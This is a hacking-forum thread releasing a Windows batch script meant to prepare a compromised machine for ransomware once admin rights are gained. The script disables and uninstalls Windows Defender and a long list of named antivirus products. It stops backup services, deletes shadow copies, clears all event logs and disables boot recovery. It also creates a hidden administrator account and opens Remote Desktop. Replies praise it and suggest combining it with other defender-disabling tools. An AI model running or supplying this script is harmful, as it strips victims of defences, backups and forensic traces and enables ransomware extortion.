[Release] Ransomware <-> Post Exploitation
by - Thursday, January 1, 1970 at 12:00 AM
As the title says, this is a batch script that automates the post exploitation phase when you gain a shell and you have obtained administrative rights, whether it's from your beacon or shell.
Note: I'll update this post with more additions in the future.


• Associate ".ransom" extention with default text editor (Recommend: replace with new extention).
• Create Local Administrator Silent User (Recommend: Change username & password).
• Create Firewall Rule & Allow Remote Desktop.
• Clear Windows Event Logs.
• Clear Windows Shadow Copies.
• Disable Windows Offline Safe Boot.
• Disable Windows Defender Real-Time Protection.
• Disable Windows Defender Watchdog Proccess.
• Disable Windows Defender ExploitGuard MDM policy.
• Uninstall Windows Defender / Features.

• Kill & Remove any of the following Endpoints:
Avast Premium Security
Avast Free Antivirus
Avast Endpoint Protection
AVG Antivirus Free
BitDefender Antivirus Plus
BitDefender Total Security
ESET File Security
ESET Endpoint Antivirus
McAfee VirusScan Enterprise
McAfee Agent
McAfee DLP Endpoint
McAfee SiteAdvisor Enterprise
McAfee Endpoint Security Platform
McAfee Endpoint Security Threat Prevention
Microsoft Security Client
Malwarebytes' Managed Client
Sophos System Protection
Sophos Remote Management System
Symantec Endpoint Protection
Symantec Backup Exec Remote Agent for Windows
Panda WatchGuard Endpoint Security
Webroot SecureAnywhere

• Kill any of the following running processes:
Zoolz 2 Service
Veeam Backup Catalog Data Service
Symantec System Recovery
SQLsafe Filter Service
SQLsafe Backup Service
SQL Backups
Acronis VSS Provider
VeeamDeploySvc
BackupExecVSSProvider
ackupExecRPCService
BackupExecManagementService
BackupExecJobEngine
BackupExecDeviceMediaService

[spoiler]

@echo off
cmd.exe /c assoc .ransom=txtfile
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

start wmic product where name="Avast Premium Security" call uninstall /nointeractive
start wmic product where name="Avast Free Antivirus" call uninstall /nointeractive
start wmic product where name="Avast Endpoint Protection" call uninstall /nointeractive
start wmic product where name="AVG Antivirus Free" call uninstall /nointeractive
start wmic product where name="AVG 2021" call uninstall /nointeractive
start wmic product where name="BitDefender Antivirus Plus" call uninstall /nointeractive
start wmic product where name="BitDefender Total Security" call uninstall /nointeractive
start wmic product where name="ESET File Security" call uninstall /nointeractive
start wmic product where name="ESET Endpoint Antivirus" call uninstall /nointeractive
start wmic product where name="McAfee VirusScan Enterprise" call uninstall /nointeractive
start wmic product where name="McAfee Agent" call uninstall /nointeractive
start wmic product where name="McAfee DLP Endpoint" call uninstall /nointeractive
start wmic product where name="McAfee SiteAdvisor Enterprise" call uninstall /nointeractive
start wmic product where name="McAfee Endpoint Security Platform" call uninstall /nointeractive
start wmic product where name="McAfee Endpoint Security Threat Prevention" call uninstall /nointeractive
start wmic product where name="Microsoft Security Client" call uninstall /nointeractive
start wmic product where name="Malwarebytes' Managed Client" call uninstall /nointeractive
start wmic product where name="Sophos System Protection" call uninstall /nointeractive
start wmic product where name="Sophos AutoUpdate" call uninstall /nointeractive
start wmic product where name="Sophos Remote Management System" call uninstall /nointeractive
start wmic product where name="Symantec Endpoint Protection" call uninstall /nointeractive
start wmic product where name="Symantec Backup Exec Remote Agent for Windows" call uninstall /nointeractive
start wmic product where name="Panda WatchGuard Endpoint Security" call uninstall /nointeractive
start wmic product where name="Webroot SecureAnywhere" call uninstall /nointeractive
dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet

net  stop "Zoolz 2 Service" /y
net  stop "Veeam Backup Catalog Data Service" /y
net  stop "Symantec System Recovery" /y
net  stop "SQLsafe Filter Service" /y
net  stop "SQLsafe Backup Service" /y
net  stop "SQL Backups" /y
net  stop "Acronis VSS Provider" /y
net  stop VeeamDeploySvc /y
net  stop BackupExecVSSProvider /y
net  stop BackupExecRPCService /y
net  stop BackupExecManagementService /y
net  stop BackupExecJobEngine /y
net  stop BackupExecDeviceMediaService /y

cmd.exe /C reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
cmd.exe /C netsh firewall set service type = remotedesktop mode = enable
cmd.exe /C netsh firewall set rule group="remote desktop" new enable=Yes
cmd.exe /C netsh advfirewall set rule group="remote desktop" new enable=Yes
cmd.exe /C net user Neo P@ssword123!
cmd.exe /C net localgroup Administrators Neo

powershell.exe -Command "Uninstall-WindowsFeature -Name Windows-Defender;Add-MpPreference -ExclusionExtension ".exe";wevtutil el | Foreach-Object {wevtutil cl "$_"}"
sc  config "Netbackup Legacy Network service" start= disabled
bcdedit  /set {default}
bcdedit  /set {default} recoveryenabled No
vssadmin delete shadows /all /quiet
wmic.exe  Shadowcopy Delete
wbadmin stop job -quiet


[/spoiler]

Reply
What Exploit Bypass Virustotal From Ransomware ?
Reply
(September 6, 2022, 07:06 PM)Mr_Clancy Wrote: What Exploit Bypass Virustotal From Ransomware ?


Tf is that supposed to mean..

Reply
(September 6, 2022, 09:07 AM)0x27 Wrote: thanks alot
Reply
interesting.
Reply
this is very sexc
Arx &lt;3 Punk
Reply
I'm excited to see your additions! Maybe merge some of these elements with Defeat-defender. That would be a pretty powerful tool.  😁
Reply
(October 19, 2022, 09:32 PM)RatMaster Wrote: I'm excited to see your additions! Maybe merge some of these elements with Defeat-defender. That would be a pretty powerful tool.  😁


not a bad idea :kappa:

Reply
Nice little script.
Reply


 Users viewing this thread: [Release] Ransomware <-> Post Exploitation: No users currently viewing.